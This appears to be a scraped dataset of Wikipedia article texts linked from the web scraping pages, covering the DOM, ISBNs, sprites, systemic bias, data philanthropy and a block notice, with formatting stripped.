120 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Document_Object_Model | The Document Object Model (DOM) is a cross-platform and language-independent interface that treats an HTML or XML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree. Each branch of the tree ends in a node, and each node contains objects. DOM methods allow programmatic access to the tree; with them one can change the structure, style or content of a document. 2 Nodes can have event handlers (also known as event listeners) attached to them. Once an event is triggered, the event handlers get executed. 3 The principal standardization of the DOM was handled by the World Wide Web Consortium (W3C), which last developed a recommendation in 2004. WHATWG took over the development of the standard, publishing it as a living document. The W3C now publishes stable snapshots of the WHATWG standard. In HTML DOM (Document Object Model), every element is a node: 4 The history of the Document Object Model is intertwined with the history of the "browser wars" of the late 1990s between Netscape Navigator and Microsoft Internet Explorer, as well as with that of JavaScript and JScript, the first scripting languages to be widely implemented in the JavaScript engines of web browsers. JavaScript was released by Netscape Communications in 1995 within Netscape Navigator 2.0. Netscape's competitor, Microsoft, released Internet Explorer 3.0 the following year with a reimplementation of JavaScript called JScript. JavaScript and JScript let web developers create web pages with client-side interactivity. The limited facilities for detecting user-generated events and modifying the HTML document in the first generation of these languages eventually became known as "DOM Level 0" or "Legacy DOM. No independent standard was developed for DOM Level 0, but it was partly described in the specifications for HTML 4. Legacy DOM was limited in the kinds of elements that could be accessed. Form, link and image elements could be referenced with a hierarchical name that began with the root document object. A hierarchical name could make use of either the names or the sequential index of the traversed elements. For example, a form input element could be accessed as either document.myForm.myInput or document.forms 0 .elements 0 . The Legacy DOM enabled client-side form validation and simple interface interactivity like creating tooltips. In 1997, Netscape and Microsoft released version 4.0 of Netscape Navigator and Internet Explorer respectively, adding support for Dynamic HTML (DHTML) functionality enabling changes to a loaded HTML document. DHTML required extensions to the rudimentary document object that was available in the Legacy DOM implementations. Although the Legacy DOM implementations were largely compatible since JScript was based on JavaScript, the DHTML DOM extensions were developed in parallel by each browser maker and remained incompatible. These versions of the DOM became known as the "Intermediate DOM". After the standardization of ECMAScript, the W3C DOM Working Group began drafting a standard DOM specification. The completed specification, known as "DOM Level 1", became a W3C Recommendation in late 1998. By 2005, large parts of W3C DOM were well-supported by common ECMAScript-enabled browsers, including Internet Explorer 6 (from 2001), Opera, Safari and Gecko-based browsers (like Mozilla, Firefox, SeaMonkey and Camino). The W3C DOM Working Group published its final recommendation and subsequently disbanded in 2004. Development efforts migrated to the WHATWG, which continues to maintain a living standard. 5 In 2009, the Web Applications group reorganized DOM activities at the W3C. 6 In 2013, due to a lack of progress and the impending release of HTML5, the DOM Level 4 specification was reassigned to the HTML Working Group to expedite its completion. 7 Meanwhile, in 2015, the Web Applications group was disbanded and DOM stewardship passed to the Web Platform group. 8 Beginning with the publication of DOM Level 4 in 2015, the W3C creates new recommendations based on snapshots of the WHATWG standard. To render a document such as a HTML page, most web browsers use an internal model similar to the DOM. The nodes of every document are organized in a tree structure, called the DOM tree, with the topmost node named as "Document object". When an HTML page is rendered in browsers, the browser downloads the HTML into local memory and automatically parses it to display the page on screen. However, the DOM does not necessarily need to be represented as a tree, 11 and some browsers have used other internal models. 12 When a web page is loaded, the browser creates a Document Object Model of the page, which is an object oriented representation of an HTML document that acts as an interface between JavaScript and the document itself. This allows the creation of dynamic web pages, 13 because within a page JavaScript can: A Document Object Model (DOM) tree is a hierarchical representation of an HTML or XML document. It consists of a root node, which is the document itself, and a series of child nodes that represent the elements, attributes, and text content of the document. Each node in the tree has a parent node, except for the root node, and can have multiple child nodes. Elements in an HTML or XML document are represented as nodes in the DOM tree. Each element node has a tag name, attributes, and can contain other element nodes or text nodes as children. For example, an HTML document with the following structure: will be represented in the DOM tree as: Text content within an element is represented as a text node in the DOM tree. Text nodes do not have attributes or child nodes, and are always leaf nodes in the tree. For example, the text content "My Website" in the title element and "Welcome" in the h1 element in the above example are both represented as text nodes. Attributes of an element are represented as properties of the element node in the DOM tree. For example, an element with the following HTML: will be represented in the DOM tree as: The DOM tree can be manipulated using JavaScript or other programming languages. Common tasks include navigating the tree, adding, removing, and modifying nodes, and getting and setting the properties of nodes. The DOM API provides a set of methods and properties to perform these operations, such as getElementById, createElement, appendChild, and innerHTML. Another way to create a DOM structure is using the innerHTML property to insert HTML code as a string, creating the elements and children in the process. For example: Another method is to use a JavaScript library or framework such as jQuery, AngularJS, React, Vue.js, etc. These libraries provide a more convenient, eloquent and efficient way to create, manipulate and interact with the DOM. It is also possible to create a DOM structure from an XML or JSON data, using JavaScript methods to parse the data and create the nodes accordingly. Creating a DOM structure does not necessarily mean that it will be displayed in the web page, it only exists in memory and should be appended to the document body or a specific container to be rendered. In summary, creating a DOM structure involves creating individual nodes and organizing them in a hierarchical structure using JavaScript or other programming languages, and it can be done using several methods depending on the use case and the developer's preference. Because the DOM supports navigation in any direction (e.g., parent and previous sibling) and allows for arbitrary modifications, an implementation must at least buffer the document that has been read so far (or some parsed form of it). 14 Web browsers rely on layout engines to parse HTML into a DOM. Some layout engines, such as Trident MSHTML, are associated primarily or exclusively with a particular browser, such as Internet Explorer. Others, including Blink, WebKit, and Gecko, are shared by a number of browsers, such as Google Chrome, Opera, Safari, and Firefox. The different layout engines implement the DOM standards to varying degrees of compliance. DOM implementations: APIs that expose DOM implementations: Inspection tools: |
121 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/ISBN_(identifier) | The International Standard Book Number (ISBN) is a numeric commercial book identifier that is intended to be unique. a b Publishers purchase or receive ISBNs from an affiliate of the International ISBN Agency. 2 A different ISBN is assigned to each separate edition and variation of a publication, but not to a simple reprinting of an existing item. For example, an e-book, a paperback and a hardcover edition of the same book must each have a different ISBN, but an unchanged reprint of the hardcover edition keeps the same ISBN. The ISBN is ten digits long if assigned before 2007, and thirteen digits long if assigned on or after 1 January 2007. c The method of assigning an ISBN is nation-specific and varies between countries, often depending on how large the publishing industry is within a country. The first version of the ISBN identification format was devised in 1967, based upon the 9 digit Standard Book Numbering (SBN) created in 1966. The 10 digit ISBN format was developed by the International Organization for Standardization (ISO) and was published in 1970 as international standard ISO 2108 (any 9 digit SBN can be converted to a 10 digit ISBN by prefixing it with a zero). Privately published books sometimes appear without an ISBN. The International ISBN Agency sometimes assigns ISBNs to such books on its own initiative. 4 A separate identifier code of a similar kind, the International Standard Serial Number (ISSN), identifies periodical publications such as magazines and newspapers. The International Standard Music Number (ISMN) covers musical scores. The Standard Book Number (SBN) is a commercial system using nine-digit code numbers to identify books. In 1965, British bookseller and stationers WHSmith announced plans to implement a standard numbering system for its books. 1 They hired consultants to work on their behalf, and the system was devised by Gordon Foster, emeritus professor of statistics at Trinity College Dublin. 5 The International Organization for Standardization (ISO) Technical Committee on Documentation sought to adapt the British SBN for international use. The ISBN identification format was conceived in 1967 in the United Kingdom by David Whitaker 6 7 (regarded as the "Father of the ISBN") 8 and in 1968 in the United States by Emery Koltay 6 (who later became director of the U.S. ISBN agency R. R. Bowker). 8 9 10 The 10 digit ISBN format was developed by the ISO and was published in 1970 as international standard ISO 2108. 1 6 The United Kingdom continued to use the nine-digit SBN code until 1974. ISO has appointed the International ISBN Agency as the registration authority for ISBN worldwide and the ISBN Standard is developed under the control of ISO Technical Committee 46 Subcommittee 9 TC 46 SC 9. The ISO on-line facility only refers back to 1978. 11 An SBN may be converted to an ISBN by prefixing the digit "0". For example, the second edition of Mr. J. G. Reeder Returns, published by Hodder in 1965, has "SBN 340 01381 8", where "340" indicates the publisher, "01381" is the serial number assigned by the publisher, and "8" is the check digit. By prefixing a zero, this can be converted to ISBN 0 340 01381 8; the check digit does not need to be re-calculated. Some publishers, such as Ballantine Books, would sometimes use 12 digit SBNs where the last three digits indicated the price of the book; 12 for example, Woodstock Handmade Houses had a 12 digit Standard Book Number of 345 24223 8 595 (valid SBN: 345 24223 8, ISBN: 0 345 24223 8), 13 and it cost US$5.95. 14 Since 1 January 2007, ISBNs have contained thirteen digits, a format that is compatible with "Bookland" European Article Numbers, which have 13 digits. 3 The United States, with 3.9 million registered ISBNs in 2020, was by far the biggest user of the ISBN identifier in 2020, followed by the Republic of Korea (329,582), Germany (284,000), China (263,066), the UK (188,553) and Indonesia (144,793). Lifetime ISBNs registered in the United States are over 39 million as of 2020. 15 A separate ISBN is assigned to each edition and variation (except reprintings) of a publication. For example, an ebook, audiobook, paperback, and hardcover edition of the same book must each have a different ISBN assigned to it. 16 : 12 The ISBN is thirteen digits long if assigned on or after 1 January 2007, and ten digits long if assigned before 2007. c 3 An International Standard Book Number consists of four parts (if it is a 10 digit ISBN) or five parts (for a 13 digit ISBN). Section 5 of the International ISBN Agency's official user manual 16 : 11 describes the structure of the 13 digit ISBN, as follows: A 13 digit ISBN can be separated into its parts (prefix element, registration group, registrant, publication and check digit), and when this is done it is customary to separate the parts with hyphens or spaces. Separating the parts (registration group, registrant, publication and check digit) of a 10 digit ISBN is also done with either hyphens or spaces. Figuring out how to correctly separate a given ISBN is complicated, because most of the parts do not use a fixed number of digits. e ISBN issuance is country-specific, in that ISBNs are issued by the ISBN registration agency that is responsible for that country or territory regardless of the publication language. The ranges of ISBNs assigned to any particular country are based on the publishing profile of the country concerned, and so the ranges will vary depending on the number of books and the number, type, and size of publishers that are active. Some ISBN registration agencies are based in national libraries or within ministries of culture and thus may receive direct funding from the government to support their services. In other cases, the ISBN registration service is provided by organisations such as bibliographic data providers that are not government funded. 18 A full directory of ISBN agencies is available on the International ISBN Agency website. 19 A list for a few countries is given below: The ISBN registration group element is a 1 to 5 digit number that is valid within a single prefix element (i.e. one of 978 or 979), 16 : 11 and can be separated between hyphens, such as "978 1 ... . Registration groups have primarily been allocated within the 978 prefix element. 38 The single-digit registration groups within the 978 prefix element are: 0 or 1 for English-speaking countries; 2 for French-speaking countries; 3 for German-speaking countries; 4 for Japan; 5 for Russian-speaking countries; and 7 for People's Republic of China. Example 5 digit registration groups are 99936 and 99980, for Bhutan. The allocated registration groups are: 0 5, 600 631, 65, 7, 80 94, 950 989, 9910 9989, and 99901 99993. 39 Books published in rare languages typically have longer group elements. 40 Within the 979 prefix element, the registration group 0 is reserved for compatibility with International Standard Music Numbers (ISMNs), but such material is not actually assigned an ISBN. 41 The registration groups within prefix element 979 that have been assigned are 8 for the United States of America, 10 for France, 11 for the Republic of Korea, and 12 for Italy. 42 The original 9 digit standard book number (SBN) had no registration group identifier, but prefixing a zero to a 9 digit SBN creates a valid 10 digit ISBN. The national ISBN agency assigns the registrant element (cf. Category:ISBN agencies) and an accompanying series of ISBNs within that registrant element to the publisher; the publisher then allocates one of the ISBNs to each of its books. In most countries, a book publisher is not legally required to assign an ISBN, although most large bookstores only handle publications that have ISBNs assigned to them. 43 44 45 The International ISBN Agency maintains the details of over one million ISBN prefixes and publishers in the Global Register of Publishers. 46 This database is freely searchable over the internet. Publishers receive blocks of ISBNs, with larger blocks allotted to publishers expecting to need them; a small publisher may receive ISBNs of one or more digits for the registration group identifier, several digits for the registrant, and a single digit for the publication element. Once that block of ISBNs is used, the publisher may receive another block of ISBNs, with a different registrant element. Consequently, a publisher may have different allotted registrant elements. There also may be more than one registration group identifier used in a country. This might occur once all the registrant elements from a particular registration group have been allocated to publishers. By using variable block lengths, registration agencies are able to customise the allocations of ISBNs that they make to publishers. For example, a large publisher may be given a block of ISBNs where fewer digits are allocated for the registrant element and many digits are allocated for the publication element; likewise, countries publishing many titles have few allocated digits for the registration group identifier and many for the registrant and publication elements. 47 Here are some sample ISBN 10 codes, illustrating block length variations. English-language registration group elements are 0 and 1 (2 of more than 220 registration group elements). These two registration group elements are divided into registrant elements in a systematic pattern, which allows their length to be determined, as follows: 17 A check digit is a form of redundancy check used for error detection, the decimal equivalent of a binary check bit. It consists of a single digit computed from the other digits in the number. The method for the 10 digit ISBN is an extension of that for SBNs, so the two systems are compatible; an SBN prefixed with a zero (the 10 digit ISBN) will give the same check digit as the SBN without the zero. The check digit is base eleven, and can be an integer between 0 and 9, or an 'X'. The system for 13 digit ISBNs is not compatible with SBNs and will, in general, give a different check digit from the corresponding 10 digit ISBN, so does not provide the same protection against transposition. This is because the 13 digit code was required to be compatible with the EAN format, and hence could not contain the letter 'X'. According to the 2001 edition of the International ISBN Agency's official user manual, 48 the ISBN 10 check digit (which is the last digit of the 10 digit ISBN) must range from 0 to 10 (the symbol 'X' is used for 10), and must be such that the sum of the ten digits, each multiplied by its (integer) weight, descending from 10 to 1, is a multiple of 11. That is, if xi is the ith digit, then x10 must be chosen such that: For example, for an ISBN 10 of 0 306 40615 2: Formally, using modular arithmetic, this is rendered It is also true for ISBN 10s that the sum of all ten digits, each multiplied by its weight in ascending order from 1 to 10, is a multiple of 11. For this example: Formally, this is rendered The two most common errors in handling an ISBN (e.g. when typing it or writing it down) are a single altered digit or the transposition of adjacent digits. It can be proven mathematically that all pairs of valid ISBN 10s differ in at least two digits. It can also be proven that there are no pairs of valid ISBN 10s with eight identical digits and two transposed digits (these proofs are true because the ISBN is less than eleven digits long and because 11 is a prime number). The ISBN check digit method therefore ensures that it will always be possible to detect these two most common types of error, i.e., if either of these types of error has occurred, the result will never be a valid ISBN—the sum of the digits multiplied by their weights will never be a multiple of 11. However, if the error were to occur in the publishing house and remain undetected, the book would be issued with an invalid ISBN. 49 In contrast, it is possible for other types of error, such as two altered non-transposed digits, or three altered digits, to result in a valid ISBN (although it is still unlikely). Each of the first nine digits of the 10 digit ISBN—excluding the check digit itself—is multiplied by its (integer) weight, descending from 10 to 2, and the sum of these nine products found. The value of the check digit is simply the one number between 0 and 10 which, when added to this sum, means the total is a multiple of 11. For example, the check digit for an ISBN 10 of 0 306 40615 ? is calculated as follows: Adding 2 to 130 gives a multiple of 11 (because 132 12 11)—this is the only number between 0 and 10 which does so. Therefore, the check digit has to be 2, and the complete sequence is ISBN 0 306 40615 2. If the value of x 10 displaystyle x 10 required to satisfy this condition is 10, then an 'X' should be used. Alternatively, modular arithmetic is convenient for calculating the check digit using modulus 11. The remainder of this sum when it is divided by 11 (i.e. its value modulo 11), is computed. This remainder plus the check digit must equal either 0 or 11. Therefore, the check digit is (11 minus the remainder of the sum of the products modulo 11) modulo 11. Taking the remainder modulo 11 a second time accounts for the possibility that the first remainder is 0. Without the second modulo operation, the calculation could result in a check digit value of 11 0 11, which is invalid. (Strictly speaking, the first "modulo 11" is not needed, but it may be considered to simplify the calculation.) For example, the check digit for the ISBN of 0 306 40615 ? is calculated as follows: Thus the check digit is 2. It is possible to avoid the multiplications in a software implementation by using two accumulators. Repeatedly adding t into s computes the necessary multiples: The modular reduction can be done once at the end, as shown above (in which case s could hold a value as large as 496, for the invalid ISBN 99999 999 9 X), or s and t could be reduced by a conditional subtract after each addition. Appendix 1 of the International ISBN Agency's official user manual 16 : 33 describes how the 13 digit ISBN check digit is calculated. The ISBN 13 check digit, which is the last digit of the ISBN, must range from 0 to 9 and must be such that the sum of all the thirteen digits, each multiplied by its (integer) weight, alternating between 1 and 3, is a multiple of 10. As ISBN 13 is a subset of EAN 13, the algorithm for calculating the check digit is exactly the same for both. Formally, using modular arithmetic, this is rendered: The calculation of an ISBN 13 check digit begins with the first twelve digits of the 13 digit ISBN (thus excluding the check digit itself). Each digit, from left to right, is alternately multiplied by 1 or 3, then those products are summed modulo 10 to give a value ranging from 0 to 9. Subtracted from 10, that leaves a result from 1 to 10. A zero replaces a ten, so, in all cases, a single check digit results. For example, the ISBN 13 check digit of 978 0 306 40615 ? is calculated as follows: Thus, the check digit is 7, and the complete sequence is ISBN 978 0 306 40615 7. In general, the ISBN check digit is calculated as follows. Let Then This check system—similar to the UPC check digit formula—does not catch all errors of adjacent digit transposition. Specifically, if the difference between two adjacent digits is 5, the check digit will not catch their transposition. For instance, the above example allows this situation with the 6 followed by a 1. The correct order contributes 3 6 1 1 19 to the sum; while, if the digits are transposed (1 followed by a 6), the contribution of those two digits will be 3 1 1 6 9. However, 19 and 9 are congruent modulo 10, and so produce the same, final result: both ISBNs will have a check digit of 7. The ISBN 10 formula uses the prime modulus 11 which avoids this blind spot, but requires more than the digits 0 9 to express the check digit. Additionally, if the sum of the 2nd, 4th, 6th, 8th, 10th, and 12th digits is tripled then added to the remaining digits (1st, 3rd, 5th, 7th, 9th, 11th, and 13th), the total will always be divisible by 10 (i.e., end in 0). A 10 digit ISBN is converted to a 13 digit ISBN by prepending "978" to the ISBN 10 and recalculating the final checksum digit using the ISBN 13 algorithm. The reverse process can also be performed, but not for numbers commencing with a prefix other than 978, which have no 10 digit equivalent. Publishers and libraries have varied policies about the use of the ISBN check digit. Publishers sometimes fail to check the correspondence of a book title and its ISBN before publishing it; that failure causes book identification problems for libraries, booksellers, and readers. 50 For example, ISBN 0 590 76484 5 is shared by two books—Ninja gaiden: a novel based on the best-selling game by Tecmo (1990) and Wacky laws (1997), both published by Scholastic. Most libraries and booksellers display the book record for an invalid ISBN issued by the publisher. The Library of Congress catalogue contains books published with invalid ISBNs, which it usually tags with the phrase "Cancelled ISBN". 51 The International Union Library Catalog (a.k.a., WorldCat OCLC—Online Computer Library Center system) often indexes by invalid ISBNs, if the book is indexed in that way by a member library. 52 Only the term "ISBN" should be used; the terms "eISBN" and "e-ISBN" have historically been sources of confusion and should be avoided. If a book exists in one or more digital (e-book) formats, each of those formats must have its own ISBN. In other words, each of the three separate EPUB, Amazon Kindle, and PDF formats of a particular book will have its own specific ISBN. They should not share the ISBN of the paper version, and there is no generic "eISBN" which encompasses all the e-book formats for a title. 53 The barcodes on a book's back cover (or inside a mass-market paperback book's front cover) are EAN 13; they may have a separate barcode encoding five digits called an EAN 5 for the currency and the recommended retail price. 54 For 10 digit ISBNs, the number "978", the Bookland "country code", is prefixed to the ISBN in the barcode data, and the check digit is recalculated according to the EAN 13 formula (modulo 10, 1 and 3 weighting on alternating digits). Partly because of an expected shortage in certain ISBN categories, the International Organization for Standardization (ISO) decided to migrate to a 13 digit ISBN (ISBN 13). The process began on 1 January 2005 and was planned to conclude on 1 January 2007. 55 As of 2011 update , all the 13 digit ISBNs began with 978. As the 978 ISBN supply is exhausted, the 979 prefix was introduced. Part of the 979 prefix is reserved for use with the Musicland code for musical scores with an ISMN. The 10 digit ISMN codes differed visually as they began with an "M" letter; the bar code represents the "M" as a zero, and for checksum purposes it counted as a 3. All ISMNs are now thirteen digits commencing 979 0; 979 1 to 979 9 will be used by ISBN. Publisher identification code numbers are unlikely to be the same in the 978 and 979 ISBNs, likewise, there is no guarantee that language area code numbers will be the same. Moreover, the 10 digit ISBN check digit generally is not the same as the 13 digit ISBN check digit. Because the GTIN 13 is part of the Global Trade Item Number (GTIN) system (that includes the GTIN 14, the GTIN 12, and the GTIN 8), the 13 digit ISBN falls within the 14 digit data field range. 56 Barcode format compatibility is maintained, because (aside from the group breaks) the ISBN 13 barcode format is identical to the EAN barcode format of existing 10 digit ISBNs. So, migration to an EAN-based system allows booksellers the use of a single numbering system for both books and non-book products that is compatible with existing ISBN based data, with only minimal changes to information technology systems. Hence, many booksellers (e.g., Barnes Noble) migrated to EAN barcodes as early as March 2005. Although many American and Canadian booksellers were able to read EAN 13 barcodes before 2005, most general retailers could not read them. The upgrading of the UPC barcode system to full EAN 13, in 2005, eased migration to the ISBN in North America. |
122 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=14 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
123 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/CSS_sprite | In computer graphics, a sprite is a two-dimensional bitmap that is integrated into a larger scene, most often in a 2D video game. Originally, the term sprite referred to fixed-sized objects composited together, by hardware, with a background. 1 Use of the term has since become more general. Systems with hardware sprites include arcade video games of the 1970s and 1980s; game consoles including as the Atari VCS (1977), ColecoVision (1982), Famicom (1983), Genesis Mega Drive (1988); and home computers such as the TI 99 4 (1979), Atari 8 bit computers (1979), Commodore 64 (1982), MSX (1983), Amiga (1985), and X68000 (1987). Hardware varies in the number of sprites supported, the size and colors of each sprite, and special effects such as scaling or reporting pixel-precise overlap. Hardware composition of sprites occurs as each scan line is prepared for the video output device, such as a cathode-ray tube, without involvement of the main CPU and without the need for a full-screen frame buffer. 1 Sprites can be positioned or altered by setting attributes used during the hardware composition process. The number of sprites which can be displayed per scan line is often lower than the total number of sprites a system supports. For example, the Texas Instruments TMS9918 chip supports 32 sprites, but only four can appear on the same scan line. The CPUs in modern computers, video game consoles, and mobile devices are fast enough that bitmaps can be drawn into a frame buffer without special hardware assistance. Beyond that, GPUs can render vast numbers of scaled, rotated, antialiased, partially translucent, very high resolution images in parallel with the CPU. According to Karl Guttag, one of two engineers for the 1979 Texas Instruments TMS9918 video display processor, this use of the word sprite came from David Ackley, a manager at TI. 2 It was also used by Danny Hillis at Texas Instruments in the late 1970s. 3 The term was derived from the fact that sprites "float" on top of the background image without overwriting it, much like a ghost or mythological sprite. Some hardware manufacturers used different terms, especially before sprite became common: Player Missile Graphics was a term used by Atari, Inc. for hardware sprites in the Atari 8 bit computers (1979) and Atari 5200 console (1982). 4 The term reflects the use for both characters ("players") and smaller associated objects ("missiles") that share the same color. The earlier Atari Video Computer System and some Atari arcade games used player, missile, and ball. Stamp was used in some arcade hardware in the early 1980s, including Ms. Pac-Man. 5 Movable Object Block, or MOB, was used in MOS Technology's graphics chip literature. Commodore, the main user of MOS chips and the owner of MOS for most of the chip maker's lifetime, instead used the term sprite for the Commodore 64. OBJs (short for objects) is used in the developer manuals for the NES, Super NES, and Game Boy. The region of video RAM used to store sprite attributes and coordinates is called OAM (Object Attribute Memory). This also applies to the Game Boy Advance and Nintendo DS. The use of sprites originated with arcade video games. Nolan Bushnell came up with the original concept when he developed the first arcade video game, Computer Space (1971). Technical limitations made it difficult to adapt the early mainframe game Spacewar (1962), which performed an entire screen refresh for every little movement, so he came up with a solution to the problem: controlling each individual game element with a dedicated transistor. The rockets were essentially hardwired bitmaps that moved around the screen independently of the background, an important innovation for producing screen images more efficiently and providing the basis for sprite graphics. 6 The earliest video games to represent player characters as human player sprites were arcade sports video games, beginning with Taito's TV Basketball, 7 8 9 released in April 1974 and licensed to Midway Manufacturing for release in North America. 10 Designed by Tomohiro Nishikado, he wanted to move beyond simple Pong-style rectangles to character graphics, by rearranging the rectangle shapes into objects that look like basketball players and basketball hoops. 11 12 Ramtek released another sports video game in October 1974, Baseball, 10 which similarly displayed human-like characters. 13 The Namco Galaxian arcade system board, for the 1979 arcade game Galaxian, displays animated, multi-colored sprites over a scrolling background. 14 It became the basis for Nintendo's Radar Scope and Donkey Kong arcade hardware and home consoles such as the Nintendo Entertainment System. 15 According to Steve Golson from General Computer Corporation, the term "stamp" was used instead of "sprite" at the time. 5 Signetics devised the first chips capable of generating sprite graphics (referred to as objects by Signetics) for home systems. The Signetics 2636 video processors were first used in the 1978 1292 Advanced Programmable Video System and later in the 1979 Elektor TV Games Computer. The Atari VCS, released in 1977, has a hardware sprite implementation where five graphical objects can be moved independently of the game playfield. The term sprite was not in use at the time. The VCS's sprites are called movable objects in the programming manual, further identified as two players, two missiles, and one ball. 16 These each consist of a single row of pixels that are displayed on a scan line. To produce a two-dimensional shape, the sprite's single-row bitmap is altered by software from one scan line to the next. The 1979 Atari 400 and 800 home computers have similar, but more elaborate, circuitry capable of moving eight single-color objects per scan line: four 8 bit wide players and four 2 bit wide missiles. Each is the full height of the display—a long, thin strip. DMA from a table in memory automatically sets the graphics pattern registers for each scan line. Hardware registers control the horizontal position of each player and missile. Vertical motion is achieved by moving the bitmap data within a player or missile's strip. The feature was called player missile graphics by Atari. Texas Instruments developed the TMS9918 chip with sprite support for its 1979 TI 99 4 home computer. An updated version is used in the 1981 TI 99 4A. These are base hardware specs and do not include additional programming techniques, such as using raster interrupts to repurpose sprites mid-frame. |
124 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:WikiProject_Countering_systemic_bias | The Wikipedia project contains several types of WP:NPOV violations that arise from systemic bias in the demographics of the editor community. 1 Encyclopedic coverage is imbalanced and often omits points of view from under-represented demographic groups. Systemic bias on Wikipedia may take the form of gender, geographical, racial, ideological, and other forms of bias. See Further reading for studies, statistics, and more information that demonstrate contributor or subject imbalances. The first goal is extremely broad, as under-represented POVs may affect almost any article. It may be advisable to focus on projects within the scope of the related WikiProjects listed below. The second goal can be accomplished by WikiProject members sharing the latest research about Wikipedia's systemic bias on this WikiProject's talk page, as well as in articles about Wikipedia itself and in relevant content and policy discussions among editors. Research consistently finds systemic bias in Wikipedia's selection of articles in its various language editions. 1 2 This bias leads, without necessarily any conscious intention, to the propagation of various prejudices and omission of important information. Wikipedia's increasing influence on the way people comprehend the world makes this bias a potentially serious threat. Wikipedia has a longstanding controversy concerning gender bias and sexism. 3 4 5 6 7 8 Wikipedia has been criticized 3 by some journalists and academics for lacking not only female contributors but also extensive and in-depth encyclopedic attention to many topics regarding gender. An article in The New York Times cites a Wikimedia Foundation study which found that fewer than 13% of contributors to Wikipedia were women. Sue Gardner, then the executive director of the foundation, said increasing diversity was about making the encyclopedia "as good as it could be". Factors the article cited as possibly discouraging women from editing included the "obsessive fact-loving realm", associations with the "hard-driving hacker crowd", and the necessity to be "open to very difficult, high-conflict people, even misogynists". 4 A challenge for editors trying to add Black history articles to Wikipedia is the requirement that potential article topics, such as historical individuals or events, meet Wikipedia's "notability" criteria. Sara Boboltz of HuffPost wrote that the Wikipedia notability criteria "is a troubling problem for those fighting for more content about women and minorities", because "there's simply less published documentation on many accomplished women and minorities throughout history they were often ignored, after all, or forced to make their contributions as someone else's assistant. 9 Maher stated that one issue is that "content on Wikipedia has to be backed up by secondary sources, sources that she says throughout history have contained a bias toward white men; "people of color have not been represented in mainstream knowledge creation or inclusion in that knowledge, as "encyclopedias of old were mostly written by European men. 10 Although these assume bias, the presence of white nationalists and other far-right extremists on Wikipedia is an ongoing problem that is unlikely to go away in the near future given the rightward political shift in countries where the majority of the site’s users live. The SPLC cited the article Race and intelligence as an example of the alt-right influence on Wikipedia, stating that at that time the article presented a "false balance" between fringe racialist views and the "mainstream perspective in psychology. 11 Some task forces that focus on particular aspects of systemic bias are linked below: Talk pages for the following task forces have not been edited in over a year: There are many things you may do, listed roughly from least to most intensive: There are several WikiProjects and regional notice boards that have potential to help out in our efforts. We may also eventually want to create new WikiProjects as part of this effort. WikiProjects: See also: See also: Also The template globalize may be placed to produce The template toofewopinions may be placed to produce The template religion primary may be placed to produce The template recentism may be placed to produce When these templates are used they should be accompanied by a brief note on the talk page to outline what exactly you feel needs to be addressed. Please add your name to the members page. We of course encourage all members of WikiProject Countering systemic bias, to also promote their membership to other Wikipedians, by adding the Userbox template to their personal user page. This is fast and easy to do. You only need to add this line at your user page: User WikiProject Countering systemic bias , and then you will find this wonderful blue userbox displayed: If you have specific interests relating to countering systemic bias, feel free to briefly describe them there or on this Wikiproject's talk page so we can get a sense of the strengths of the project. |
125 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_philanthropy | Data philanthropy describes a form of collaboration in which private sector companies share data for public benefit. 1 There are multiple uses of data philanthropy being explored from humanitarian, corporate, human rights, and academic use. Since introducing the term in 2011, the United Nations Global Pulse has advocated for a global "data philanthropy movement". 2 A large amount of data collected from the Internet comes from user-generated content. This includes blogs, posts on social networks, and information submitted in forms. Besides user-generated data, corporations are also currently mining data from consumers in order to understand customers, identify new markets, and make investment decisions. Kirkpatrick, the Director at United Nations Global Pulse, labelled this data "massive passive data" or "data exhaust". 3 Data philanthropy is the idea that something positive can come from this overload of data. Data philanthropy is defined as the private sector sharing this data in ways that the public can benefit. 1 The term philanthropy helps to emphasize that data sharing is a positive act and that the shared data is a public good. 3 A challenge that comes with sharing data is the Internet privacy of the user whose data is being used. Mathematical techniques (differential privacy and space time boxes) have been introduced in order to make personal data accessible, while providing the users such data with anonymity. But even if these algorithms work, there is always the possibility and fear of re-identification. 1 The other challenge is convincing corporations to share their data. The big data that corporations collect provides them with market competitiveness. They are able to infer meaning regarding consumer behaviour. The fear is that by sharing all their information, they may lose their competitive edge. 1 Furthermore, numerous moral challenges are encountered. One proposal on how to solve these moral challenges has been brought to light by Mariarosaria Taddeo in 2016, providing an ethical framework that aims to address them. 4 The goal 